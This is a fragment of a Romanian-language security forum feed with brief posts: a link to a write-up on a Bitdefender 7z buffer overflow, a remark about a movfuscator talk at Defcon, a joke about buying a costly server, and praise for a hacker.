Bitdefender’s 7z module. [return] Sursa: https://landave.io/2017/07/bitdefender-remote-stack-buffer-overflow-via-7z-ppmd/
  19. Super, nu stiam ca a facut cineva. L-am intrebat pe Domas dupa prezentarea la Defcon daca se poate face un "demovfuscator" si zicea ca teoretic e posibil, dar dificil.
  20. Nytro

    Fun stuff

  21. Incearca versiunea taraneasca de optimizare: ia un server dedicat bun si scump.
  22. E genial tipul care a facut asta. Hacker in adevaratul sens al cuvantului.
×
×
  • Create New...